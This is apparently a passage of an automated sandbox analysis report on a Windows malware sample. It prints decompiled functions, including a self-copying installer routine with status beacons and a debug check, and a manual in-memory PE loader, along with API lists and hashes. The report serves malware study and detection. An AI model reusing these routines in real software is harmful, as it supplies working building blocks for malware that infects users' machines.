                                                                                                                                                                  • Opcode Fuzzy Hash: e0c88e5c0cb610fd30cf4c45c4bbcc91821b5fdd54072593c776f8a7e42a3e9c
                                                                                                                                                                  • Instruction Fuzzy Hash: C0F0B431140A69ABCB214E55DC0CF5B7BA8EF49761F24912AFD059F320CB78C910CAE9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 10002760, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                                                  			E10002760(void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v16;
				char _v56;
				char _v84;
				void* _t14;
				intOrPtr _t20;

				_push(0xffffffff);
				_push(E10023468);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t20;
				E10001160( &_v84, __eflags, "vector<T> too long");
				_v8 = 0;
				E10001ED0( &_v56,  &_v84);
				E1000EC4B( &_v56, 0x10331ab8);
				_v8 = 0xffffffff;
				_t14 = E100011A0( &_v84);
				 *[fs:0x0] = _v16;
				return _t14;
			}









                                                                                                                                                                  0x10002763
                                                                                                                                                                  0x10002765
                                                                                                                                                                  0x10002770
                                                                                                                                                                  0x10002771
                                                                                                                                                                  0x10002783
                                                                                                                                                                  0x10002788
                                                                                                                                                                  0x10002796
                                                                                                                                                                  0x100027a4
                                                                                                                                                                  0x100027a9
                                                                                                                                                                  0x100027b3
                                                                                                                                                                  0x100027bb
                                                                                                                                                                  0x100027c5

                                                                                                                                                                  APIs
                                                                                                                                                                  • std::bad_exception::bad_exception.LIBCMTD ref: 10002796
                                                                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 100027A4
                                                                                                                                                                    • Part of subcall function 1000EC4B: RaiseException.KERNEL32(?,?,1000CCA2,100019D3,?,?,?,?,1000CCA2,100019D3,10331A60,103352E0), ref: 1000EC8B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExceptionException@8RaiseThrowstd::bad_exception::bad_exception
                                                                                                                                                                  • String ID: vector<T> too long
                                                                                                                                                                  • API String ID: 1843230569-3788999226
                                                                                                                                                                  • Opcode ID: aa5bac77e3ca4c0340f06c982ba03c51740e46cee900e1e979d60fc800d53ef8
                                                                                                                                                                  • Instruction ID: cf548f9f7ce9eaabb72c084c4c26244c4012029c0b18c491b87eb38bcea2b3c1
                                                                                                                                                                  • Opcode Fuzzy Hash: aa5bac77e3ca4c0340f06c982ba03c51740e46cee900e1e979d60fc800d53ef8
                                                                                                                                                                  • Instruction Fuzzy Hash: 53F034B5811588ABDB18EBD4DD82BDEB738EB05BA0F504368F5126A6C4DB346A04CB90
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1000443C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 76%
                                                                                                                                                                  			E1000443C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t20;
				intOrPtr* _t23;
				void* _t25;
				void* _t26;
				void* _t27;

				_t27 = __eflags;
				_push(0x44);
				E1000F06B(E10022FB8, __ebx, __edi, __esi);
				E10001160(_t25 - 0x28, _t27, "invalid string position");
				_t2 = _t25 - 4;
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t20 = _t25 - 0x50;
				E10001DF0(_t20,  *_t2, _t25 - 0x28);
				 *((intOrPtr*)(_t25 - 0x50)) = 0x100242c8;
				E1000EC4B(_t25 - 0x50, 0x10331468);
				asm("int3");
				_push(__esi);
				_t23 = _t20;
				E10001F50(_t20,  *((intOrPtr*)(_t26 + 8)));
				 *_t23 = 0x100242c8;
				return _t23;
			}








                                                                                                                                                                  0x1000443c
                                                                                                                                                                  0x1000443c
                                                                                                                                                                  0x10004443
                                                                                                                                                                  0x10004450
                                                                                                                                                                  0x10004455
                                                                                                                                                                  0x10004455
                                                                                                                                                                  0x1000445d
                                                                                                                                                                  0x10004460
                                                                                                                                                                  0x1000446e
                                                                                                                                                                  0x10004475
                                                                                                                                                                  0x1000447a
                                                                                                                                                                  0x1000447b
                                                                                                                                                                  0x10004480
                                                                                                                                                                  0x10004482
                                                                                                                                                                  0x10004487
                                                                                                                                                                  0x10004490

                                                                                                                                                                  APIs
                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 10004443
                                                                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 10004475
                                                                                                                                                                    • Part of subcall function 1000EC4B: RaiseException.KERNEL32(?,?,1000CCA2,100019D3,?,?,?,?,1000CCA2,100019D3,10331A60,103352E0), ref: 1000EC8B
                                                                                                                                                                    • Part of subcall function 10001F50: std::exception::exception.LIBCMT ref: 10001F73
                                                                                                                                                                  Strings
                                                                                                                                                                  • invalid string position, xrefs: 10004448
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExceptionException@8H_prolog3RaiseThrowstd::exception::exception
                                                                                                                                                                  • String ID: invalid string position
                                                                                                                                                                  • API String ID: 2977319401-1799206989
                                                                                                                                                                  • Opcode ID: 8a38253c4c6a58d41603c5e0b19f6e40374d81d82671ff6e0ca88bff6985b20b
                                                                                                                                                                  • Instruction ID: e86674a8940bf3c69d49669cad452c3bb0f00751fa4d3b8ebb3f475700820a46
                                                                                                                                                                  • Opcode Fuzzy Hash: 8a38253c4c6a58d41603c5e0b19f6e40374d81d82671ff6e0ca88bff6985b20b
                                                                                                                                                                  • Instruction Fuzzy Hash: D5E06DB5500168EBD704DBD4EC41ADEB778EF44391FC2092AF244A7149CF75A909CB64
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00432369, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 0043238A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                                  • String ID: AdvApi32.dll$RegDeleteKeyExW
                                                                                                                                                                  • API String ID: 190572456-850864035
                                                                                                                                                                  • Opcode ID: 972075db9fca83f0d40a6fd5cca472dbcd246f0a9001e6db26b71d5e82a43d27
                                                                                                                                                                  • Instruction ID: fb630ad8f9700892e412268510f11e005e9a0b69cc22ea950bcdbab578128180
                                                                                                                                                                  • Opcode Fuzzy Hash: 972075db9fca83f0d40a6fd5cca472dbcd246f0a9001e6db26b71d5e82a43d27
                                                                                                                                                                  • Instruction Fuzzy Hash: E5E0863170D3115BC7494F15BD13B453E60A704B0270000BEED0C923A2D2F9DC048BAC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Analysis Process: 83C12B0D0FA88B10.exe PID: 6636 Parent PID: 6500 83C12B0D0FA88B10.exeCOMMON

                                                                                                                                                                  Executed Functions

                                                                                                                                                                  Function 10020600, Relevance: 40.4, APIs: 10, Strings: 13, Instructions: 176COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 88%
                                                                                                                                                                  			E10020600(void* __ebx, void* __edi, void* __eflags) {
				int _v8;
				intOrPtr _v16;
				char _v44;
				char _v311;
				char _v312;
				char _v575;
				char _v576;
				long _v580;
				intOrPtr _v584;
				intOrPtr _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				intOrPtr _v600;
				intOrPtr _v604;
				intOrPtr _v608;
				intOrPtr _v612;
				intOrPtr _v616;
				intOrPtr _v620;
				intOrPtr _v624;
				intOrPtr _v628;
				void* __esi;
				void* _t46;
				int _t47;
				void* _t56;
				void* _t57;
				intOrPtr _t73;
				int _t75;
				int _t77;
				void* _t101;
				intOrPtr _t104;
				void* _t108;
				void* _t109;
				void* _t111;
				intOrPtr _t114;
				void* _t115;
				intOrPtr _t116;
				intOrPtr _t118;
				intOrPtr _t120;
				void* _t125;

				_t125 = __eflags;
				_t100 = __edi;
				_t82 = __ebx;
				_push(0xffffffff);
				_push(E100233D5);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t104;
				_push(_t101);
				E1001FDA0();
				_v312 = 0;
				E1000CF80(__edi,  &_v311, 0, 0x103);
				GetModuleFileNameA(0,  &_v312, 0x104);
				E1001A660(__ebx, _t100, _t101, _t125,  &_v44); // executed
				_v8 = 0;
				_t46 = E10001A50( &_v312, E100011E0( &_v44));
				_t108 = _t104 - 0x264 + 0x18;
				_t126 = _t46;
				if(_t46 == 0) {
					_t47 = E1001A150("Global\\exist_sign__install_r3");
					_t109 = _t108 + 4;
					__eflags = _t47;
					if(_t47 == 0) {
						_v576 = 0;
						E1000CF80(_t100,  &_v575, 0, 0x103);
						GetTempPathA(0x104,  &_v576);
						E1000CDB3( &_v576,  &_v576, 0x104, E100011E0( &_v44));
						_t111 = _t109 + 0x18;
						CopyFileA( &_v312,  &_v576, 0);
						_v580 = GetTickCount();
						while(1) {
							_t56 = E1001A1D0( &_v312);
							_t102 = _t56;
							_t57 = E1001A1D0( &_v576);
							_t111 = _t111 + 8;
							__eflags = _t56 - _t57;
							if(__eflags == 0) {
								break;
							}
							Sleep(0x3e8);
							__eflags = GetTickCount() - _v580 - 0x7530;
							if(__eflags <= 0) {
								continue;
							} else {
							}
							break;
						}
						E1001FE40();
						E10020020(_t82, _t100, _t102, __eflags, "install", "user01", "-0.1", "51.0", "exe");
						_t114 = _t111 + 0x14 - 0x1c;
						_t89 = _t114;
						_v588 = _t114;
						_v612 = E10001160(_t114, __eflags, "status=main_start");
						E100202C0(_t82, _t100, _t102, __eflags);
						_t115 = _t114 + 0x1c;
						__eflags = PathFileExistsA("C:\\hijack");
						if(__eflags != 0) {
							L15:
							_t116 = _t115 - 0x1c;
							_v592 = _t116;
							_v616 = E10001160(_t116, __eflags, "status=check_debug");
							E100202C0(_t82, _t100, _t102, __eflags);
							_t118 = _t116 + 0x1c - 0x1c;
							_v596 = _t118;
							_v620 = E10001160(_t118, __eflags, "user01");
							E1001FF30(_t82, _t100, _t102, __eflags);
							_t120 = _t118 + 0x1c - 0x1c;
							_v600 = _t120;
							_v624 = E10001160(_t120, __eflags, "user01");
							E1001FE50(_t82, _t100, _t102, __eflags);
							_v604 = _t120 + 0x1c - 0x1c;
							_v628 = E10001160(_t120 + 0x1c - 0x1c, __eflags, "status=main_over");
							E100202C0(_t82, _t100, _t102, __eflags);
						} else {
							E1001A100();
							_t75 = E1001A110(_t89);
							__eflags = _t75;
							if(_t75 == 0) {
								L12:
							} else {
								__eflags = E10019D70();
								if(__eflags == 0) {
									_t77 = E1001FA90(_t82, _t100, _t102, __eflags, 0x3e8, 0);
									_t115 = _t115 + 8;
									__eflags = _t77;
									if(__eflags != 0) {
										goto L15;
									} else {
									}
								} else {
									goto L12;
								}
							}
						}
					} else {
					}
					E1001A2C0();
					_v608 = 1;
					_v8 = 0xffffffff;
					E100011A0( &_v44);
					_t73 = _v608;
				} else {
					E10020BC0(__ebx, _t100, _t101, _t126, "51.0"); // executed
					_v584 = 1;
					_v8 = 0xffffffff;
					E100011A0( &_v44);
					_t73 = _v584;
				}
				 *[fs:0x0] = _v16;
				return _t73;
			}










































                                                                                                                                                                  0x10020600
                                                                                                                                                                  0x10020600
                                                                                                                                                                  0x10020600
                                                                                                                                                                  0x10020603
                                                                                                                                                                  0x10020605
                                                                                                                                                                  0x10020610
                                                                                                                                                                  0x10020611
                                                                                                                                                                  0x1002061e
                                                                                                                                                                  0x1002061f
                                                                                                                                                                  0x10020624
                                                                                                                                                                  0x10020639
                                                                                                                                                                  0x1002064f
                                                                                                                                                                  0x10020659
                                                                                                                                                                  0x10020661
                                                                                                                                                                  0x10020678
                                                                                                                                                                  0x1002067d
                                                                                                                                                                  0x10020680
                                                                                                                                                                  0x10020682
                                                                                                                                                                  0x100206bf
                                                                                                                                                                  0x100206c4
                                                                                                                                                                  0x100206c7
                                                                                                                                                                  0x100206c9
                                                                                                                                                                  0x100206d0
                                                                                                                                                                  0x100206e5
                                                                                                                                                                  0x100206f9
                                                                                                                                                                  0x10020714
                                                                                                                                                                  0x10020719
                                                                                                                                                                  0x1002072c
                                                                                                                                                                  0x10020738
                                                                                                                                                                  0x1002073e
                                                                                                                                                                  0x10020745
                                                                                                                                                                  0x1002074d
                                                                                                                                                                  0x10020756
                                                                                                                                                                  0x1002075b
                                                                                                                                                                  0x1002075e
                                                                                                                                                                  0x10020760
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10020767
                                                                                                                                                                  0x10020779
                                                                                                                                                                  0x1002077e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10020780
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1002077e
                                                                                                                                                                  0x10020784
                                                                                                                                                                  0x100207a2
                                                                                                                                                                  0x100207aa
                                                                                                                                                                  0x100207ad
                                                                                                                                                                  0x100207af
                                                                                                                                                                  0x100207bf
                                                                                                                                                                  0x100207c5
                                                                                                                                                                  0x100207ca
                                                                                                                                                                  0x100207d8
                                                                                                                                                                  0x100207da
                                                                                                                                                                  0x10020810
                                                                                                                                                                  0x10020810
                                                                                                                                                                  0x10020815
                                                                                                                                                                  0x10020825
                                                                                                                                                                  0x1002082b
                                                                                                                                                                  0x10020833
                                                                                                                                                                  0x10020838
                                                                                                                                                                  0x10020848
                                                                                                                                                                  0x1002084e
                                                                                                                                                                  0x10020856
                                                                                                                                                                  0x1002085b
                                                                                                                                                                  0x1002086b
                                                                                                                                                                  0x10020871
                                                                                                                                                                  0x1002087e
                                                                                                                                                                  0x1002088e
                                                                                                                                                                  0x10020894
                                                                                                                                                                  0x100207dc
                                                                                                                                                                  0x100207dc
                                                                                                                                                                  0x100207e1
                                                                                                                                                                  0x100207e6
                                                                                                                                                                  0x100207e8
                                                                                                                                                                  0x100207f3
                                                                                                                                                                  0x100207ea
                                                                                                                                                                  0x100207ef
                                                                                                                                                                  0x100207f1
                                                                                                                                                                  0x100207ff
                                                                                                                                                                  0x10020804
                                                                                                                                                                  0x10020807
                                                                                                                                                                  0x10020809
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1002080b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x100207f1
                                                                                                                                                                  0x100207e8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x100206cb
                                                                                                                                                                  0x1002089c
                                                                                                                                                                  0x100208a1
                                                                                                                                                                  0x100208ab
                                                                                                                                                                  0x100208b5
                                                                                                                                                                  0x100208ba
                                                                                                                                                                  0x10020684
                                                                                                                                                                  0x10020689
                                                                                                                                                                  0x10020691
                                                                                                                                                                  0x1002069b
                                                                                                                                                                  0x100206a5
                                                                                                                                                                  0x100206aa
                                                                                                                                                                  0x100206aa
                                                                                                                                                                  0x100208c3
                                                                                                                                                                  0x100208ce

                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 10020639
                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1002064F
                                                                                                                                                                    • Part of subcall function 1001A660: _memset.LIBCMT ref: 1001A6B1
                                                                                                                                                                    • Part of subcall function 1001A660: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A6C7
                                                                                                                                                                    • Part of subcall function 1001A660: _sprintf.LIBCMT ref: 1001A705
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileModuleName_memset$_sprintf
                                                                                                                                                                  • String ID: -0.1$51.0$51.0$C:\hijack$Global\exist_sign__install_r3$exe$install$status=check_debug$status=main_over$status=main_start$user01$user01$user01
                                                                                                                                                                  • API String ID: 3079340674-877224509
                                                                                                                                                                  • Opcode ID: 08ff04adda192b7303e2b5c42e65d93590a46696a8f5dba613417a9f261e5fd2
                                                                                                                                                                  • Instruction ID: 4ca8eb26ed237a7cbfddb670d92fde38fcb821bcdd61c2f7abf1832b517c0666
                                                                                                                                                                  • Opcode Fuzzy Hash: 08ff04adda192b7303e2b5c42e65d93590a46696a8f5dba613417a9f261e5fd2
                                                                                                                                                                  • Instruction Fuzzy Hash: 7E51C2B9D003089BEB10FBA4DC4ABDD7675EB10344F4401A5FA0966183EF71BB84CBA2
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001A1D0, Relevance: 3.0, APIs: 2, Instructions: 21fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001A1D0(CHAR* _a4) {
				struct _WIN32_FIND_DATAA _v324;
				intOrPtr _v328;
				void* _v332;
				void* _t11;

				_v328 = 0;
				_t11 = FindFirstFileA(_a4,  &_v324); // executed
				_v332 = _t11;
				if(_v332 != 0xffffffff) {
					_v328 = _v324.nFileSizeLow;
				}
				FindClose(_v332); // executed
				return _v328;
			}







                                                                                                                                                                  0x1001a1d9
                                                                                                                                                                  0x1001a1ee
                                                                                                                                                                  0x1001a1f4
                                                                                                                                                                  0x1001a201
                                                                                                                                                                  0x1001a209
                                                                                                                                                                  0x1001a209
                                                                                                                                                                  0x1001a216
                                                                                                                                                                  0x1001a225

                                                                                                                                                                  APIs
                                                                                                                                                                  • FindFirstFileA.KERNEL32(1001A6D9,?), ref: 1001A1EE
                                                                                                                                                                  • FindClose.KERNEL32(000000FF), ref: 1001A216
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2295610775-0
                                                                                                                                                                  • Opcode ID: 286baa16cd583546fe3035f76e659778872b80ee5ac4cf2322355d765b363de7
                                                                                                                                                                  • Instruction ID: d31bde6dcc0951e355ad99ae7a1c5ee3f3ec40d99bb51e99ff820f39f399f313
                                                                                                                                                                  • Opcode Fuzzy Hash: 286baa16cd583546fe3035f76e659778872b80ee5ac4cf2322355d765b363de7
                                                                                                                                                                  • Instruction Fuzzy Hash: 65F0A57590022C9BDB70DF64DD88BDDB7B8AB08310F1002D4E91DA32A0DB30AAD58F51
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001B680, Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 350libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 73%
                                                                                                                                                                  			E1001B680(void* __ebx, void* __edi, void* __esi, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed short* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				_Unknown_base(*)()* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v68;
				char _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr* _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				void* _t170;
				void* _t173;
				void* _t182;
				intOrPtr _t184;
				void* _t194;
				void* _t203;
				void* _t206;
				void* _t207;
				void* _t209;
				intOrPtr _t220;
				intOrPtr _t225;
				void* _t239;
				intOrPtr _t311;
				void* _t326;
				void* _t327;
				void* _t328;
				void* _t329;
				void* _t330;
				void* _t332;
				void* _t333;
				void* _t334;
				void* _t337;
				void* _t338;
				void* _t339;

				_t327 = __esi;
				_t326 = __edi;
				_t239 = __ebx;
				_v76 = 0;
				_v20 = 0;
				_v28 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetNativeSystemInfo");
				_t170 = E1001AEA0(_a8, 0x40);
				_t329 = _t328 + 8;
				if(_t170 != 0) {
					_v16 = _a4;
					if(( *_v16 & 0x0000ffff) == 0x5a4d) {
						_t9 =  &(_v16[0x1e]); // 0xc707ebe8
						_t173 = E1001AEA0(_a8,  *_t9 + 0xf8);
						_t330 = _t329 + 8;
						if(_t173 != 0) {
							_t13 =  &(_v16[0x1e]); // 0xc707ebe8
							_v84 = _a4 +  *_t13;
							if( *_v84 == 0x4550) {
								if(( *(_v84 + 4) & 0x0000ffff) == 0x14c) {
									if(( *(_v84 + 0x38) & 0x00000001) == 0) {
										_v88 = _v84 + ( *(_v84 + 0x14) & 0x0000ffff) + 0x18;
										_v36 =  *(_v84 + 0x38);
										_v12 = 0;
										while(_v12 < ( *(_v84 + 6) & 0x0000ffff)) {
											if( *((intOrPtr*)(_v88 + 0x10)) != 0) {
												_v92 =  *((intOrPtr*)(_v88 + 0xc)) +  *((intOrPtr*)(_v88 + 0x10));
											} else {
												_v92 =  *((intOrPtr*)(_v88 + 0xc)) + _v36;
											}
											if(_v92 > _v20) {
												_v20 = _v92;
											}
											_v12 = _v12 + 1;
											_v88 = _v88 + 0x28;
										}
										_v28( &_v72);
										_v32 = E1001AEE0( *((intOrPtr*)(_v84 + 0x50)), _v68);
										_t182 = E1001AEE0(_v20, _v68);
										_t332 = _t330 + 0x10;
										if(_v32 == _t182) {
											_t184 = _a12( *((intOrPtr*)(_v84 + 0x34)), _v32, 0x3000, 4, _a32);
											_t333 = _t332 + 0x14;
											_v24 = _t184;
											if(_v24 != 0) {
												L26:
												_v76 = HeapAlloc(GetProcessHeap(), 8, 0x40);
												if(_v76 != 0) {
													 *((intOrPtr*)(_v76 + 4)) = _v24;
													asm("sbb ecx, ecx");
													 *(_v76 + 0x14) =  ~( ~( *(_v84 + 0x16) & 0x2000));
													 *((intOrPtr*)(_v76 + 0x1c)) = _a12;
													 *((intOrPtr*)(_v76 + 0x20)) = _a16;
													 *((intOrPtr*)(_v76 + 0x24)) = _a20;
													 *((intOrPtr*)(_v76 + 0x28)) = _a24;
													 *((intOrPtr*)(_v76 + 0x2c)) = _a28;
													 *((intOrPtr*)(_v76 + 0x34)) = _a32;
													 *((intOrPtr*)(_v76 + 0x3c)) = _v68;
													_t194 = E1001AEA0(_a8,  *((intOrPtr*)(_v84 + 0x54)));
													_t334 = _t333 + 8;
													if(_t194 != 0) {
														_v8 = _a12(_v24,  *((intOrPtr*)(_v84 + 0x54)), 0x1000, 4, _a32);
														E1000D1F0(_t239, _t326, _t327, _v8, _v16,  *((intOrPtr*)(_v84 + 0x54)));
														_t121 =  &(_v16[0x1e]); // 0xc707ebe8
														 *_v76 = _v8 +  *_t121;
														 *((intOrPtr*)( *_v76 + 0x34)) = _v24;
														_t203 = E1001B360(_t239, _t326, _t327, _a4, _a8, _v84, _v76); // executed
														_t337 = _t334 + 0x30;
														if(_t203 != 0) {
															_t311 =  *((intOrPtr*)( *_v76 + 0x34)) -  *((intOrPtr*)(_v84 + 0x34));
															_v80 = _t311;
															if(_t311 == 0) {
																 *((intOrPtr*)(_v76 + 0x18)) = 1;
															} else {
																_t220 = E1001B120(_v76, _v80);
																_t337 = _t337 + 8;
																 *((intOrPtr*)(_v76 + 0x18)) = _t220;
															}
															_t206 = E1001ABC0(_v76); // executed
															_t338 = _t337 + 4;
															if(_t206 != 0) {
																_t207 = E1001B4F0(_v76); // executed
																_t339 = _t338 + 4;
																if(_t207 != 0) {
																	_t209 = E1001ADE0(_v76);
																	_t339 = _t339 + 4;
																	if(_t209 != 0) {
																		if( *((intOrPtr*)( *_v76 + 0x28)) == 0) {
																			 *((intOrPtr*)(_v76 + 0x38)) = 0;
																			L49:
																			return _v76;
																		}
																		if( *(_v76 + 0x14) == 0) {
																			 *((intOrPtr*)(_v76 + 0x38)) = _v24 +  *((intOrPtr*)( *_v76 + 0x28));
																			L47:
																			goto L49;
																		}
																		_v100 = _v24 +  *((intOrPtr*)( *_v76 + 0x28));
																		_v96 = _v100(_v24, 1, 0);
																		if(_v96 != 0) {
																			 *((intOrPtr*)(_v76 + 0x10)) = 1;
																			goto L47;
																		}
																		SetLastError(0x45a);
																		L50:
																		E1001A9C0(_v76);
																		return 0;
																	}
																	goto L50;
																}
																goto L50;
															}
															goto L50;
														}
														goto L50;
													}
													goto L50;
												}
												_a16(_v24, 0, 0x8000, _a32);
												SetLastError(0xe);
												return 0;
											}
											_t225 = _a12(0, _v32, 0x3000, 4, _a32);
											_t333 = _t333 + 0x14;
											_v24 = _t225;
											if(_v24 != 0) {
												goto L26;
											}
											SetLastError(0xe);
											return 0;
										}
										SetLastError(0xc1);
										return 0;
									}
									SetLastError(0xc1);
									return 0;
								}
								SetLastError(0xc1);
								return 0;
							}
							SetLastError(0xc1);
							return 0;
						}
						return 0;
					}
					SetLastError(0xc1);
					return 0;
				}
				return 0;
			}












































                                                                                                                                                                  0x1001b680
                                                                                                                                                                  0x1001b680
                                                                                                                                                                  0x1001b680
                                                                                                                                                                  0x1001b686
                                                                                                                                                                  0x1001b68d
                                                                                                                                                                  0x1001b6ab
                                                                                                                                                                  0x1001b6b4
                                                                                                                                                                  0x1001b6b9
                                                                                                                                                                  0x1001b6be
                                                                                                                                                                  0x1001b6ca
                                                                                                                                                                  0x1001b6d8
                                                                                                                                                                  0x1001b6ef
                                                                                                                                                                  0x1001b6fd
                                                                                                                                                                  0x1001b702
                                                                                                                                                                  0x1001b707
                                                                                                                                                                  0x1001b716
                                                                                                                                                                  0x1001b719
                                                                                                                                                                  0x1001b725
                                                                                                                                                                  0x1001b746
                                                                                                                                                                  0x1001b763
                                                                                                                                                                  0x1001b785
                                                                                                                                                                  0x1001b78e
                                                                                                                                                                  0x1001b791
                                                                                                                                                                  0x1001b7ac
                                                                                                                                                                  0x1001b7bf
                                                                                                                                                                  0x1001b7db
                                                                                                                                                                  0x1001b7c1
                                                                                                                                                                  0x1001b7ca
                                                                                                                                                                  0x1001b7ca
                                                                                                                                                                  0x1001b7e4
                                                                                                                                                                  0x1001b7e9
                                                                                                                                                                  0x1001b7e9
                                                                                                                                                                  0x1001b7a0
                                                                                                                                                                  0x1001b7a9
                                                                                                                                                                  0x1001b7a9
